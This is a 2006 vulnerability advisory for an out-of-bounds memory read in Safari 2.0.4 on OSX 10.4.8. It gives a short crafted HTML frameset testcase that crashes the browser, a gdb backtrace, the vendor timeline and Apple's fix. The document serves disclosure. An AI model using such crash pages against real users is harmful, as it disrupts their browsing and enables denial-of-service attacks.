Apple OSX Safari 2.0.4 Out-of-Bounds Memory Read
Release Date:
November 28th, 2006
Severity:
Medium
Vendor:
Apple
Versions Affected:
OSX 10.4.8
Safari 2.0.4 (419.3)
Versions Not Affected:
WebKit build 17902
Overview:
A out-of-bounds memory read vulnerability exists within Safari 2.0.4, and all prior versions which allows for an attacker to post a specially crafted .html page causing the application to crash.
Technical Details:
Below is a basic testcase to reproduce this issue:
TABLE >
FRAME SCROLLING= NAME=TOMFERRIS SRC= SCROLLING= >
FRAMESET >
Below is the crash triggered on OSX 10.4.8 with Safari 2.0.4 (419.3):
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000344
0x90a4e380 in objc_msgSend ()
(gdb) bt
#0 0x90a4e380 in objc_msgSend ()
#1 0x1633f2f0 in ?? ()
#2 0x9524b1b7 in -[WebMainResourceClient receivedError:] ()
#3 0x9524b00d in -[WebBaseResourceHandleDelegate connection:didFailWithError:] ()
#4 0x927b2d7e in -[NSURLConnection(NSURLConnectionInternal) _sendDidFailCallback] ()
#5 0x9278db15 in -[NSURLConnection(NSURLConnectionInternal) _sendCallbacks] ()
#6 0x9278d7b3 in _sendCallbacks ()
#7 0x90823379 in CFRunLoopRunSpecific ()
#8 0x90822eb5 in CFRunLoopRunInMode ()
#9 0x92f02b90 in RunCurrentEventLoopInMode ()
#10 0x92f02297 in ReceiveNextEventCommon ()
#11 0x92f020ee in BlockUntilNextEventMatchingListInMode ()
#12 0x933a3771 in _DPSNextEvent ()
== snip ==
Vendor Status:
09/05/2006 - Vendor is notified
Solution:
Apple Security Update 2006-007 fixes this issue.
Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com
Related Links:
http://security-protocols.com/poc/sp-x38.html
http://security-protocols.com/sp-x38-advisory.php
http://nightly.webkit.org
http://apple.com